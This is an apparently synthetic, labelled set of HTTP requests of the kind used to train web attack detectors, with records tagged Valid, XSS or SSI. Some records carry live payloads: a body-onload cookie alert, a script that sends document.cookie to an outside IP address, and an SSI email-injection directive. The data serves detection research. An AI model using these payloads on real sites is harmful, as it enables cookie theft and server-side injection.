Pragma: no-cache
Proxy-Authorization: NTLM YWpzemVvY2lob3NuaXNqRXJybHptQnJqdGhoZGR0UnN4ckU=
Authorization: NTLM cHNiSEdwYXJsOW50aXV6czl3b29mcmF0QU44OWRodGVxdWE=
Range: 9605-9
Referer: http://egoh0qu.st/1Nbal/ihinlpdl/Xirxv.pl
TE: deflate,gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/7.6 (Machintosh; U; PPC 4.3; e0-tI; rv:4.9.4) Gecko/19983350
UA-CPU: x86
UA-Disp: 7236,439,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 486x328
Via: 8.6 192.8.242.189:62224
Transfer-Encoding: compress
Upgrade: 2dsxif/4.8, DkeRu/7.0, doebe/0.4, thiwnu/1.1
Warning: 748 211.185.9.15 "1tesO3h" "Fri, 30 Nov 07 14:52:33 UTC"
X-Forwarded-For: 183.169.171.70
X-Serial-Number: 380344
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17026
Start - Id: 10616
class: Valid
GET /eOK_9rLiVMIiuFEt/raaoYzpCm/rmyubWtBbZ/eettsomeit/odmoncicrAnw3z0tooe/ohefNrldiesnszcsnio1/0Nxmx6Vy8i/e@xD/iosyfmMI0TgO/ejqrYs21a066@/serldyth.aspx? HTTP/1.0
Host: 11.30.24.208
Connection: keep-alive
Accept: audio/basic, image/*;q=0.7, application/*;q=0.7
Accept-Charset: iso-8859-4;q=0.1, cp-932;q=0.0, x-mac-roman, windows-1250, iso-8859-9
Accept-Encoding: *;q=0.2
Accept-Language: wsdOfeds-tkK;q=0.1
Cache-Control: no-store
Client-ip: 69.171.140.108
Cookie: Soin=idahitworadnselpby;tle2iei=otc(buylvbscripta zre8AHuX;ta=<;ianUt=t;dto;b1YivE6=804950;tr3oflon0=dpsk
Cookie2: $Version="1"
Date: Fri, 23 Jan 04 13:13:07 GMT
ETag: "hAk9xp3_AgA2Oo9ib"
Expect: 100-continue
From: urh4ame@uIj4a1nz.ch
If-Modified-Since: Fri, 06 Aug 04 24:35:25 CET
If-Unmodified-Since: Sat, 12 Nov 05 01:03:26 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 07 Dec 08 02:09:34 GMT
Max-Forwards: 34
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM c3VjbndhQW10R3MycmxzaW15Y3J0aGV1YWVEcmVjYXRlTnpmbHRpbnJ0ZG5pcXNE
Authorization: ry9i xkihloth=haygea
Range: 757-,8584-
Referer: http://sxtwrq.uk/eiitdes/Lhee36/feqn.dll
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.1 (X11; U; Unix 7.3; ls-su; rv:8.3.4) Gecko/70922787
UA-CPU: Sparc
UA-Disp: 9474,018,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9748x5631
Via: FTP/4.3 www.yvgt.htm, asont/1.0 www.emnodrsi.png, 4.2 www.6sYtena.shtml
Transfer-Encoding: compress
Upgrade: telnx/9.9, iusnr/3.5
Warning: 595 239.203.101.239 "rlhjs5iafegTthd" "Tue, 05 Feb 08 07:12:57 UTC"
X-Forwarded-For: 93.154.42.186
X-Serial-Number: 719045121636524930
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 10616
Start - Id: 34567
class: Valid
PUT /elA/lscript@U7N.0GX0ZFfrominsert/s3/c@IgnWr/eoLicaoNlqnkdsnk.gif? HTTP/1.1
Content-Length: 187
Content-Language: c,nqlt
Content-Encoding: compress
Content-Location: /rcta/dumnt4.wmn
Content-MD5: N3Nub3dlcnJhc2x0ZTR0Tg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Jan 06 02:08:48 UTC
Last-Modified: Wed, 12 Jan 05 18:01:09 CET
Host: 236.149.74.199:9
Connection: close
Accept: image/png;q=0.4, video/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 172.87.226.168
Cookie: dsxtMftgS=l Anihosr(t';ceh=tRaYJovDo45;AmriteeenYanpe=0ttt:ht09
Cookie2: $Version="5"
Date: Fri, 12 Jun 09 10:50:21 GMT
ETag: W/"o4s9_Hc.PgpgE6-d"
Expect: 100-continue
From: r4o9@ecoOy.ch
If-Modified-Since: Fri, 23 Apr 04 06:23:16 CET
If-Unmodified-Since: Mon, 10 Oct 05 02:46:33 UTC
If-Match: *
If-None-Match: *
If-Range: "nay.3oCiL3iD5KB6kjd"
Max-Forwards: 9
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: Digest opaque="oyitDd4"
Range: -4597,119988-57606
Referer: /trjlhh.conf
TE: deflate,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/4.5 (X11; U; Open BSD i386 5.2; hh-8g; rv:5.8.5) Gecko/69622372
UA-CPU: StrongARM
UA-Disp: 259,255,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 811x2979
Via: 8.1 www.tg2nhae.html, 5.9 168.82.94.27, 2.5 80.253.232.71
Transfer-Encoding: identity
Upgrade: aaee/2.3, sryou/1.6, tsu7z/2.8
Warning: 255 www.p5msr.tiff:10 "hpA8iaYfstbseet" 
X-Forwarded-For: 178.146.180.28
X-Serial-Number: 26405487538799285497
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ip7t9u8Xmocha=;o&rum=9042&d35IGae7=([T2=varaas&ClrsjrGn1P=uhzirn2C&iS8gqrr=663865&uZ1S3sn=azuo&mdest=mlhyinott6bs)fm&ognvSaoesung=eItx&dgea=clG+&iVTq=5&rM7dsei=m3&zohnnb=57908

End - Id: 34567
Start - Id: 21410
class: Valid
GET /wby/cgva/emrueaNdek.js?sld7t=a8buPGYsgm&nhn9hebn6wezwrs=897116245&Aikd=lexu4&eenzereiva=304&ayeae5fimna=nJH&5nzeToY=oMdph&5kI8tmpuZ64CLj=qu%3Clg HTTP/1.0
Host: www.nsfc7.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.5, identity
Accept-Language: t-w
Cache-Control: min-fresh=6
Client-ip: 255.170.108.35
Cookie: dlCwe=%rmscripttoiadvbscripttskrl;6t8=Rhigyax;ioIwrr6d=171705123
Cookie2: $Version="3"
Date: Sun, 17 Dec 06 13:14:57 UTC
ETag: "i4tZM1cZHYd0h@8Sv"
Expect: qntPidc=jxEE3hka;one4o=e1n7
From: 2t9et@hgaorWhudc.ch
If-Modified-Since: Tue, 16 Feb 10 09:02:37 UTC
If-Unmodified-Since: Wed, 14 Jan 09 11:02:39 GMT
If-Match: *
If-None-Match: "y71DgebIHHn-36M7v6eq"
If-Range: "epBL93y6Xrt4SSgL4"
Max-Forwards: 843
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest realm
Range: 9389-552,913284-,86-
Referer: /sisEe/zarlc/ehcn/Aa72/5noe.png
TE: trailers,chunked;q=0.6
Trailer: From
User-Agent: 5of2O (67nwRrYf; ipSqOuuw_; 5JpC24; 1@xJPB)
UA-CPU: 68000
UA-Disp: 6376,0383,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 528x4272
Via: 4.3 139.58.207.84, 7.1 www.oyin.gif, 8.6 201.172.208.189:573
Transfer-Encoding: gzip
Upgrade: O9a1kz/8.8, oleC/5.4, shee/7.3
Warning: 217 7.232.161.211 "en9ruae" 
X-Forwarded-For: 131.153.107.61
X-Serial-Number: 2418413
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21410
Start - Id: 6025
class: Valid
PUT /5dEnotrceeapt/isgous/gUtM1IYezY7osz/n7gzq1Z8@LEMXJsnLEVE/w@4kXBpSWMEG/eNVv5xTEr-6L0QN6M/a9nt2bwdsaneosanv/oA.html? HTTP/1.1
Content-Length: 162
Content-Language: Mcboot5u,rTOi
Content-Encoding: identity
Content-Location: /s70am.gif
Content-MD5: emRhcmdlbWV2OXBlbUk2dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Nov 05 18:11:22 GMT
Last-Modified: Fri, 15 May 09 01:16:35 CET
Host: 215.43.10.3
Connection: lsqg
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 152.52.201.65
Cookie: fsen=qhdivta;ewi0fNm=Cwak
Cookie2: $Version="28"
Date: Fri, 31 Jul 09 19:22:12 CET
ETag: "sLRkHI8O1J0ET79oSGG"
Expect: 100-continue
From: otmtez@uns3et.be
If-Modified-Since: Thu, 22 Jul 04 21:10:26 CET
If-Unmodified-Since: Thu, 18 Oct 07 14:16:39 GMT
If-Match: "CxCdqGl99E4hEox.h"
If-None-Match: "ydqR2i5vIcSgk.ixH9KJ"
If-Range: Sun, 17 Dec 06 10:42:34 UTC
Max-Forwards: 309
MIME-Version: 1.5
Pragma: lpWehic='erPsJf'
Proxy-Authorization: NTLM aTl5RWV0Z3dvYnBjb29lcm9pZWduZUxpdGt0aW5hZUlUeW5SaGVvbkU3YWI=
Authorization: Digest uri=/trds/hsuaey.pdf
Range: -57,295976-,-66
Referer: http://onh4.cz/fait/a8Toteig/3Reeo0jo/oreurmTf.gif
TE: chunked;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/7.6 (X11; U; Unix 1.6; pm-sc; rv:7.7.0) Gecko/26481926
UA-CPU: PowerPC
UA-Disp: 653,9690,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3798x773
Via: HTTP/5.8 www.aAob4.jpeg, FTP/8.5 www.ara38.tiff, FTP/4.9 www.gs9aErd.shtml
Transfer-Encoding: identity
Upgrade: ctdT90/6.6, ehttn/1.4, ath/2.3, rdties/0.0, wtnsiW/6.4
Warning: 972 www.rXyaxuai.css "RbSVoIei" "Tue, 23 Jan 07 18:13:35 CET"
X-Forwarded-For: 167.170.119.99
X-Serial-Number: 1285901452667782524
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

scriptsCdps=htpass&7eiwrneAA5vrs7=gin4&pZ_yM=yioExhwnoet&catd1execjD8rW8.=wLyHMZ&9mshwWE=(S&romE=yr4Awz&gmr=sIl0SHaYgp&loeEea3er=6&NSTbQKJXh=naotxoptoptcopy:t

End - Id: 6025
Start - Id: 3557
class: Valid
GET /omressShsd2Rht9s/hiLEcmd9@bN/e.uO4kzjhNMex/s5x5teieur/OinsertOXpasswdg_Zexecy/n_1rhAn4ThHKlFlwS/s-bnZStRd6m2j/aoL9QOYrvDz6wuv-bl/p_mwDU6IxsJMZgs9aUd0/T@sSYchild0scriptvn.mspx?lIl3nQ=aecaY4&0Nmtuu4yrpmmw4=953&yasedoni=nt%40kRY1W0b0n&en=olg&4ooysnnhrhkn=58733221&TzeayrnoIisIho=orEmDrUjq9a&cneseu=4ebTgHVZIMm.&ozgjnJwDkE=651722&brx2neeEedtmuau=%7Cs&0sah7heeui=IiIpt&LMa-var@Hr=oao+&mSee=owIaDspGb&unionjCwzWReY=0&XYHvselect=602&bt4e=glennVf HTTP/1.0
Host: www.ofRnaf.fr
Connection: fsi5tts
Accept: audio/*, audio/*;q=0.4
Accept-Charset: x-mac-arabic, windows-1250;q=0.3, x-mac-greek;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 210.4.231.133
Cookie: 5enapeUo=an6XTKCv
Cookie2: $Version="626"
Date: Wed, 14 Oct 09 03:41:23 UTC
ETag: W/"PpJD9iFDhoNrVfyZ"
Expect: sd0s=t3AesIe
From: en6o@GjeessSofa.org
If-Modified-Since: Fri, 04 Feb 05 24:13:33 CET
If-Unmodified-Since: Wed, 23 Nov 05 15:12:48 CET
If-Match: "3tu2UPRiJ.j0XxhtmHP"
If-None-Match: "a8wz.xNyuL8gpG2ZChd"
If-Range: Sun, 26 Sep 04 02:46:43 UTC
Max-Forwards: 5
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: gu9n tahhnbsr=mhYueol
Authorization: Digest algorithm=MD5
Range: -6441,532139-93,33703-4
Referer: /tsscm/3ielwoca/the4ETer.avi
TE: trailers,gzip;q=0.3
Trailer: Date
User-Agent: nn0birdamdys
UA-CPU: MIPS
UA-Disp: 3085,4582,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 162x0756
Via: FTP/9.1 www.eahe.htm, nooge/5.4 www.weiin.jpg:750, Lefgrg/4.5 158.130.188.176
Transfer-Encoding: identity
Upgrade: pwAlRe/7.9, ott/0.0, hau4h/7.5, Oaatt/5.2
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 36.67.190.24
X-Serial-Number: 0103984813938980
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3557
Start - Id: 5967
class: Valid
PUT /tDp4ZtCngVg6Mzdtg.xM/mJE@o9veDX2l/obdovqir7/bcqF.r9Qtk.d.htm? HTTP/1.0
Content-Length: 32
Content-Language: sdBd5lg,1cr,apttecdA
Content-Encoding: identity
Content-Location: /oEssgIe/srrx/LshnoOo/tAe4d/duir.fgf
Content-MD5: b3RhdGhPZWdsbmVpZWV0Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Mar 05 17:10:46 UTC
Last-Modified: Thu, 10 Mar 05 14:56:30 UTC
Host: 224.78.141.85
Connection: IlDgnrE
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, deflate;q=0.1
Accept-Language: *
Cache-Control: i2ncgoao=ablsue1e
Client-ip: 148.96.53.107
Cookie: -uT.nmxp_RvtE=ooaltbdngo1sametaecopyo
Cookie2: $Version="5"
Date: Thu, 29 Apr 10 11:12:22 UTC
ETag: "_.Q2-F1w679-be4v"
Expect: 100-continue
From: teaboao@c5yaZsajI5.fr
If-Modified-Since: Thu, 01 Jul 04 04:33:53 GMT
If-Unmodified-Since: Tue, 08 Apr 08 03:20:01 GMT
If-Match: *
If-None-Match: "McNrh@sQLelzFRMuAcQa"
If-Range: Tue, 16 Feb 10 21:17:38 CET
Max-Forwards: 4952
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: xmqC 4sHflt=ecg4xa
Authorization: Digest algorithm=MD5
Range: 7772-71595
Referer: /taog/tIeos.swf
TE: trailers,trailers
Trailer: If-Range
User-Agent: NtjctHrti
UA-CPU: StrongARM
UA-Disp: 834,6780,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 666x9191
Via: 4.3 www.waer9.css
Transfer-Encoding: identity
Upgrade: treana/1.3, oher5/3.1
Warning: 116 www.AsB4fE.css "ceGyewiRcegeii" "Mon, 10 Aug 09 03:15:41 CET"
X-Forwarded-For: 248.70.206.255
X-Serial-Number: 840738575772869612
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rhoaao=071149&oprttrckmrn=pnldgr

End - Id: 5967
Start - Id: 47496
class: XSS
GET /Mes3hIremharrM6ix/iqQt5PRLB13.css?ru4eylstsSa=93&6Naoercr=8&ei=71&ZaetisipDmein=r%22+%3E%3Cbody%2520onload%3Dalert++%28document.cookie%29%3B%3E&nmPpastihmhSe=sFuS4CI&nph-ItQR=72&h4x8c2ch5dewpO=lfmcyiHa8dmlrt&l4cxerwzyteshoj=rtey6nac&iwmtidRtOos=+un HTTP/1.1
Host: 30.235.116.37
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip, deflate
Accept-Language: lrs-htCn, ahtsw1-teldEoee, ahkh-ntiToob, nye-faeneEnw;q=0.2, n0c6w0he-56aaAt
Cache-Control: min-fresh=30301
Client-ip: 229.228.100.156
Cookie: emahgsdcedinet=ohemi;nzehhatapl=305098573
Cookie2: $Version="037"
Date: Mon, 24 Jan 05 07:37:03 UTC
ETag: W/"mH_4FRfD3DPEqxMbE"
Expect: 100-continue
From: hD4h@iejie.gov
If-Modified-Since: Fri, 21 Jan 05 04:30:17 GMT
If-Unmodified-Since: Sun, 10 Dec 06 23:13:07 CET
If-Match: *
If-None-Match: "-d7mEccy.PWPKU7xY"
If-Range: Mon, 16 May 05 03:36:15 UTC
Max-Forwards: 2007
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: NTLM aWVxcDJhdDdkc2RhZWVkaFM3YTBkeW5sZmc5bG1wcHl1RWlvZW9tc25sZQ==
Range: 9183-933,-0
Referer: /hydui/dTys/w4os.pl
TE: trailers,trailers
Trailer: Authorization
User-Agent: 9dcghe4eil/1.2.5.8
UA-CPU: x86
UA-Disp: 076,499,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7841x155
Via: HTTP/9.4 www.ejrn.htm:2, 1sr/9.7 www.drulhe.jpeg:1312, nemoo/7.5 201.208.252.6
Transfer-Encoding: identity
Upgrade: mrsd/9.5, owur/3.3
Warning: 771 227.153.234.137 "zyfairhnrumgfhbhiV" "Thu, 01 Jan 09 02:19:05 CET"
X-Forwarded-For: 121.171.235.172
X-Serial-Number: 48112496441051
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47496
Start - Id: 46945
class: XSS
POST /dn0gAreq/oQekKXYoU8aLNk1PL1/seQusk/osbgartnoAN/eJ5lom/xF1KKLHDB_XkamIQg/ob4D_C/oyiofJ-xQkDX66Y/PvLuhpDHx/rWWBuyq.shtml? HTTP/1.1
Content-Length: 171
Content-Language: uerit
Content-Encoding: compress
Content-Location: /1cRNnvts/x5pshd/eeoli/eterixn.tar.gz
Content-MD5: bTJhdG1oTGFnYWh0dGUydA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 May 09 16:34:30 CET
Last-Modified: Thu, 15 Jun 06 20:48:30 GMT
Host: www.msiv2r8uYj.net
Connection: keep-alive
Accept: text/plain;q=0.6, image/jpeg, audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 19.178.124.208
Cookie: afys3nrelsN=nmnertiw
Cookie2: $Version="22"
Date: Sat, 02 May 09 08:04:15 UTC
ETag: "2QUjnUW_IVja0L.6aDN"
Expect: ocr3E
If-Modified-Since: Mon, 27 Jul 09 08:32:19 GMT
If-Unmodified-Since: Tue, 25 Jan 05 14:17:47 UTC
If-Match: "RyE260VFVQOsLC1@LfU5"
If-Range: *
Max-Forwards: 0
MIME-Version: 0.6
Pragma: no-cache
Authorization: NTLM bG1uMXVhdHRmb280dGVzZTBzcDVlaWh3aWNyOTFobmU5aHZpd3JBNHRh
Range: 16111-
Referer: http://wulzrn.de/riuads.html
TE: trailers,deflate;q=0.8,trailers
User-Agent: Mozilla/8.2 (X11; U; Open BSD i386 4.7; at-us; rv:7.0.6) Gecko/40817628
Via: 1.4 171.15.76.222, FTP/9.9 248.146.7.124
Transfer-Encoding: lukLdw
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ozn79hensrr=h&XilDKTFbG=<!-- -- --><script>[window.open('http://239.95.185.24/ma.cgi'+document.cookie);]</script ><!-- -- -->

End - Id: 46945
Start - Id: 39348
class: SSI
GET /whuem.aspx?e3Tat=2qtco&adsr2i=%3C%21--%23email+fromhost%3D%22www.hRhext4.com%22+tohost%3D%22mailbox.4tS5.com%22+message%3D%22snnTct+Sgnser+ke+ii9i%22+fromaddress%3D%2206qmy.com%22+toaddress%3D%223n6jt.es.com%22+subject%3D%22eg%22+sender%3D%2274ei.com%22+replyto%3D%224eoer.com%22+cc%3D%22la%22+inreplyto%3D%22anf0m+d5y+vN%22+id%3D%22reamail%22+--%3E&scriptYblocationkE=s%3A&-HDomail=tahs4o HTTP/1.1
Host: www.esmfn0.net:80
Connection: ldrtbh
Accept: image/*;q=0.0
Accept-Charset: x-mac-turkish;q=0.6, x-mac-arabic
Accept-Encoding: 
Accept-Language: n-axi, tiW4-8xreO, hoeAAo1-tsii0e;q=0.0, 3aume-sAtesfe;q=0.8
Cache-Control: no-store
Client-ip: 199.161.172.175
Cookie: mO5p90RrIM=enGNbM4@v;ciuqnbetinohN=hrselectinA;rBCeoexj=nfbTTqbeerAtudo;t4cT=dsoo3anrete;9CXZechoTMUH6J=89miwSbtv;862mshs6esns=ewfanetcatr
Cookie2: $Version="13"
Date: Sun, 09 Nov 08 12:56:14 GMT
ETag: W/"2pmeGZhNRIpjk2SWKzJ"
Expect: 1eaet=xvho;paeeore=ucea
From: ztifisTh@itMb.uk
If-Modified-Since: Mon, 13 Oct 08 21:43:56 CET
If-Unmodified-Since: Wed, 17 Jun 09 05:54:33 UTC
If-Match: "-aUfKaKEi7JU9073kL."
If-None-Match: *
If-Range: *
Max-Forwards: 7075
MIME-Version: 2.9
Pragma: nn=tmaee
Proxy-Authorization: Basic MkVhaTU6ZTJuVHRo
Authorization: Digest algorithm=MD5
Range: 1-35,9436-,-246816
Referer: /OhEr/retho/oaeor.tar.gz
TE: deflate;q=0.7,deflate;q=0.3
Trailer: Expect
User-Agent: Mozilla/7.8 (compatible; 2itfzfo; Linux i386; dtta; dicvaa0nZ; niqeiwrioa)
UA-CPU: 68000
UA-Disp: 879,3811,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5277x2991
Via: pol1et/3.2 208.247.58.3, tgeld/5.6 26.150.182.93:087
Transfer-Encoding: 6m4f; thuaijt=aeYeat
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 168.152.115.238
X-Serial-Number: 802337450581
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39348
Start - Id: 9575
class: Valid
GET /tewlarjc3iounnOres/ixOeKshfUo.Jx/i2ZcTLDTN4p@a-w7h.dll?yrdd6iIhtanwlsn=ioAmail&ckn2rtfiaQh=ywcg%27%25uHecho2oamRi&KuLFwc9O7execCX=74949&etEt=79904719&YBWZMC8O@=0314&et7eise=2250&9includeNBZAW=ehsho HTTP/1.0
Host: 234.110.76.68
Connection: close
Accept: audio/x-wav, video/mpeg;q=0.4
Accept-Charset: euc-jp;q=0.4, windows-1255, iso-8859-8;q=0.9, x-mac-roman, x-mac-japanese;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=654
Client-ip: 224.93.48.35
Cookie: 1fNhctR=qOJ
Cookie2: $Version="2"
Date: Sat, 24 Feb 07 18:25:00 CET
ETag: W/"N02s2cno3jyZhNoqZ2X"
Expect: 100-continue
From: anp51@cLdyyihltw.st
If-Modified-Since: Sat, 11 Aug 07 17:37:46 UTC
If-Unmodified-Since: Thu, 01 Mar 07 12:36:38 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 07 Apr 04 02:19:53 UTC
Max-Forwards: 323
MIME-Version: 1.3
Pragma: 08ar=caa4L
Proxy-Authorization: NTLM bGhhaGRsb3NzaGVsdGxxS2l0OVl0VFJlZXRtOGE5ZWJ0T2dpcnJ0aXd0cnI5
Authorization: Digest uri=/fsze.tiff
Range: 9-,-049
Referer: http://www.hvas.ch/wrlo/dtoy6b/zseotjd/hnijtxro.php
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.0 (compatible; MSIE 0.7; Open BSD i386; 2Sisyte)
UA-CPU: 68000
UA-Disp: 934,380,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 812x4480
Via: oEn/0.0 www.iOlneoA.css:8, HTTP/0.8 www.paasxmge.shtml
Transfer-Encoding: gzip
Upgrade: aooeh/2.6
Warning: 231 19.254.39.239 "wrftls6rer98ry" "Sat, 02 May 09 14:15:54 CET"
X-Forwarded-For: 215.37.23.155
X-Serial-Number: 2426894
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 9575
Start - Id: 6211
class: Valid
POST /t4naE92Mmw3K90l67/doY/vUhc4RnoxgneWep/hmBGuZ5MTlink5za/hoEorlo2ieehhoee/aIV7/ea2NLCgt/os5qweerreaLeroyxnm/oouPwaishu/tA_XWPmPbu6HfEPQM/eiedesee.exe? HTTP/1.1
Content-Length: 314
Content-Language: lttasnbr
Content-Encoding: deflate
Content-Location: /4neseBe/ihif/rakrN/isaurme/4gh7heQ.wmn
Content-MD5: ZW5pZG50cnAxM1FkaDRodA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Dec 07 19:15:24 CET
Last-Modified: Sat, 07 Nov 09 07:04:22 CET
Host: www.Tehvnh.gov
Connection: gi4mh
Accept: */*;q=0.2
Accept-Charset: hz-gb-2312;q=0.0, x-mac-turkish;q=0.9
Accept-Encoding: gzip;q=0.8, compress;q=0.6, gzip;q=0.6
Accept-Language: xa-sus, ur3t-taiije, lKustlwe-ydsirar;q=0.8, r-Mje0
Cache-Control: max-age=88
Client-ip: 225.75.47.14
Cookie: egoAas0aorr=@ezibh;982dgoQ9onnd=3024
Cookie2: $Version="4"
Date: Tue, 28 Jul 09 21:32:55 CET
ETag: W/"XSfWp9Vf4w3PBEA"
Expect: 100-continue
From: 9gene@c1isinsH.it
If-Modified-Since: Tue, 12 Oct 04 16:41:52 CET
If-Unmodified-Since: Fri, 13 Feb 04 21:04:41 GMT
If-Match: *
If-None-Match: "jZbAB-JWKYKhjaoM@"
If-Range: "OM74vjFWwKTG6Zbzy9_r"
Max-Forwards: 177
MIME-Version: 1.5
Pragma: her10='etadoS'
Proxy-Authorization: Basic dFJsYXJlbzM6MHFvcw==
Authorization: EIEd eOnvph=0yuacswt
Range: 08944-,040-34609
Referer: /enmeso/psfqhf/bDnnsxes.cfm
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/1.6 (compatible; Konqueror/4.1; Win98; aeSaxs; eoant5hlsf)
UA-CPU: Sparc
UA-Disp: 5852,332,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 478x1113
Via: HTTP/8.2 www.tn5i.png
Transfer-Encoding: ar3s
Upgrade: hearu/8.5
Warning: 555 94.168.0.143 "gwzateahhss4B" 
X-Forwarded-For: 27.53.52.203
X-Serial-Number: 0109822
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sirgAcGitdipegm=cQ9lqaP_hF&n8s4biWgfwer=trbWO4Q&cpso=384457&mteUEp=ns-l&vtrhsp=19564185&tangacqa=%tg7]d&uWU4LxcMLtX=4ea8ii&olneoa= hKuc+ tdt)updateratmetan&68atkbe34=3a2e1leec0&etiera3gtT=tftlib/6g sstdin;xac ~|&asNnt5heiycno=oFOf.Cdf6BK&sOf2Nym=c0mIaN&edvtn2=0&zs4eOdeo=tmeeTs9mftpazalltmoextermci

End - Id: 6211
Start - Id: 10590
class: Valid
GET /locationXeA6qetcr40tP/rti/hfotyrome/g56BgAl94/_usFimg3/v5p4il5/v-Hi_olCzYIH/lz3iXkLiV/eRRcHEPW6OMCrQuemt/xLUFS.4.qFS.css?hao=bstelnetlr%28e&denyEiotsocpea=samo%7Em4lolvstoy%2Brze+a%5B HTTP/1.1
Host: www.oajsOcz.st:8
Connection: close
Accept: video/*, application/*, application/*
Accept-Charset: iso-2022-jp, utf-7;q=0.1, gb2312;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 67.125.101.199
Cookie: wLirfateed=mrCE2@m;bklfumE3lhehian=updatejlte0httpscopys;eiNniwsit=ohtaccesso;lygeyttochsw=re%d  ls bw+-eq 29;rntven=493831638;elhDDrDeou=200345
Cookie2: $Version="6"
Date: Fri, 18 Apr 08 20:35:14 UTC
ETag: W/"lOOiGyG8HGcYRzud"
Expect: 100-continue
From: mohdrcal@8y7xh.de
If-Modified-Since: Thu, 06 Sep 07 21:23:25 CET
If-Unmodified-Since: Sat, 20 Dec 08 15:05:15 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 31 Jul 07 07:49:35 CET
Max-Forwards: 97
MIME-Version: 2.1
Pragma: spg=EDoho
Proxy-Authorization: Basic dU9vZGF4bGg6ZE9nc3I=
Authorization: aul1l tueuente=ydtg
Range: 63612-482,79-314,-3432
Referer: http://ocut.uk/ufnnrq/uut9h/ahia.shtml
TE: trailers,deflate;q=0.0,chunked;q=0.0
Trailer: Authorization
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 8.8; hp-ks; rv:5.6.6) Gecko/16575548
UA-CPU: x86
UA-Disp: 4542,2926,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 170x2008
Via: 4.4 135.238.254.201
Transfer-Encoding: eebmrn; sixeatos=eohh
Upgrade: yEh/3.1, isdw/4.5, nyc/2.7, q0n/0.1
Warning: 834 www.tef1xm.html "Tynnwvdgbhlmdt4" "Sun, 05 Mar 06 10:41:18 UTC"
X-Forwarded-For: 170.174.211.23
X-Serial-Number: 340706
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10590
Start - Id: 10330
class: Valid
